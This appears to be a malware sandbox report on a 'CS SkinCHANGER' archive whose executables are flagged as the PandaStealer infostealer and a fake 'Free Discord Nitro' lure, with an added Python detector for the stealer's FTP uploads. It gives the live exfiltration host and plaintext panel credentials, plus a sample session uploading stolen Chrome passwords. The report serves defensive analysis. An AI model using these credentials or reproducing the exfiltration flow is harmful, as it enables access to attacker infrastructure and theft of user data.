General

  • Target

    CS SkinCHANGER.rar

  • Size

    963KB

  • Sample

    210520-zvacdvge2x

  • MD5

    92992482ce924b4122ceb658336396a1

  • SHA1

    2f2789e45c5152745feb69a36e18aec7ddecfdb4

  • SHA256

    6284749beb1d6773e265524485d68268c9c90a385b82c229c16123f9839d087f

  • SHA512

    f7c4a91d31f8c7f9ded1372bf81d9516b857effca66d224d026efcc25bc52cba7c628475441df013032fdba046f4f7c6cc608ced92af7a0c3c0422159097b962

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    tasty-panel.ug
  • Port:
    21
  • Username:
    user
  • Password:
    IJNJINUJNI345457567234
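The extracted configuration is a plaintext FTP login, so the panel host and the USER/PASS pair are visible on the wire to any sensor that sees the control channel. As an added example (not part of the sandbox report), the following Python parses a reassembled FTP control stream and flags sessions that use the host and credential pair recovered above. The session text is constructed to resemble a capture of the stealer's upload: the host, port, username and password are the values extracted by the sandbox; the server banner, reply text and uploaded file name are made up for the example.

```python
"""Flag FTP control-channel sessions that carry the exfiltration
credentials recovered from the sample's configuration.

Added example, not part of the sandbox report. SAMPLE_SESSION is
constructed; only the values in IOC come from the report.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Indicators taken from the report's "Extracted / Credentials" block.
IOC = {
    "protocol": "ftp",
    "host": "tasty-panel.ug",
    "port": 21,
    "username": "user",
    "password": "IJNJINUJNI345457567234",
}

# Constructed sample: server replies (3-digit codes) interleaved with
# client commands, as seen on a reassembled TCP stream to port 21.
# Banner, reply text and the STOR file name are invented.
SAMPLE_SESSION = """\
220 (vsFTPd 3.0.3)
USER user
331 Please specify the password.
PASS IJNJINUJNI345457567234
230 Login successful.
TYPE I
200 Switching to Binary mode.
PASV
227 Entering Passive Mode (10,0,0,5,195,80).
STOR DESKTOP-ABC123_chrome_passwords.txt
150 Ok to send data.
226 Transfer complete.
QUIT
221 Goodbye.
"""

_REPLY = re.compile(r"^\d{3}[ -]")  # server reply lines start with a 3-digit code


@dataclass
class FtpSession:
    dst_host: str
    dst_port: int
    username: Optional[str] = None
    password: Optional[str] = None
    uploads: list = field(default_factory=list)


def parse_ftp_session(dst_host: str, dst_port: int, stream: str) -> FtpSession:
    """Pull the login and every upload target out of a reassembled control stream."""
    session = FtpSession(dst_host, dst_port)
    for raw in stream.splitlines():
        line = raw.rstrip("\r")
        if not line or _REPLY.match(line):
            continue  # skip server replies; only client commands matter here
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            session.username = arg
        elif verb == "PASS":
            session.password = arg  # FTP sends the password in cleartext
        elif verb in ("STOR", "APPE", "STOU"):
            session.uploads.append(arg)
    return session


def matches_ioc(session: FtpSession, ioc: dict = IOC) -> list:
    """Return the indicator names this session hits (empty list = no match).

    Host/port and the credential pair are scored separately so that a panel
    that rotates its password, or a password reused on a new host, still
    produces a partial hit worth triaging.
    """
    hits = []
    if session.dst_host.lower() == ioc["host"] and session.dst_port == ioc["port"]:
        hits.append("c2_host")
    if session.username == ioc["username"] and session.password == ioc["password"]:
        hits.append("exfil_credentials")
    if session.uploads:
        hits.append("upload")
    return hits


if __name__ == "__main__":
    s = parse_ftp_session("tasty-panel.ug", 21, SAMPLE_SESSION)
    print(s)
    print(matches_ioc(s))
```

Because the protocol is unencrypted, a match on the credential pair is a much stronger signal than a DNS or IP hit alone: it ties the connection to this specific panel login rather than to whatever else the host may serve, and it survives the panel moving to a new hostname.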

Targets

    • Target

      CS SkinCHANGER.exe

    • Size

      1016KB

    • MD5

      4baf19886d71c6d9312b3a71dcfea37e

    • SHA1

      ebacfba77117ec07d108f1b80e419be9674a48da

    • SHA256

      1d2005df287958967e785ebc022f183ed7b3878b631d75d61ed8d94bcda0ee58

    • SHA512

      0bb4d418ca83f1f85edcfbea1cf3704d42ebb9e3092c70f0a982238210adc9b51cfa47f19df67f7f2714444f04ac4bbf27887724f1dbcd6d1ba84c872074067c

    • PandaStealer

      Panda Stealer is a fork of CollectorProject Stealer written in C++.

    • Obfuscated with Agile.Net obfuscator

      Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    • Reads user/profile data of web browsers

      Infostealers commonly harvest stored browser data such as saved credentials, session cookies and autofill entries.

    • Suspicious use of SetThreadContext

    • Target

      Free Discord Nitro.exe

    • Size

      662KB

    • MD5

      98d08b7942589fe9e468a91f048dcd3d

    • SHA1

      af2950a505dd6e594f6f22305b939d5befafbe6f

    • SHA256

      2d18c676d4c1bbfa2939d36e88d95ece52af4220f0579a15d68642906a42f3c2

    • SHA512

      6672b5b900412a167d1d4e2bfaf4a2d901ed800cdb65f25645d498178839529dfb0de51610e59fb1de867a76fa8a82cdeb11ed4bfc55a4eefd356b510d62f4c5

    • Score

      10/10

    • Suspicious use of NtCreateProcessExOtherParentProcess

    • Executes dropped EXE

    • Drops startup file

    • Loads dropped DLL

    • Obfuscated with Agile.Net obfuscator

      Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    • Legitimate hosting services abused for malware hosting/C2

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v6

Tasks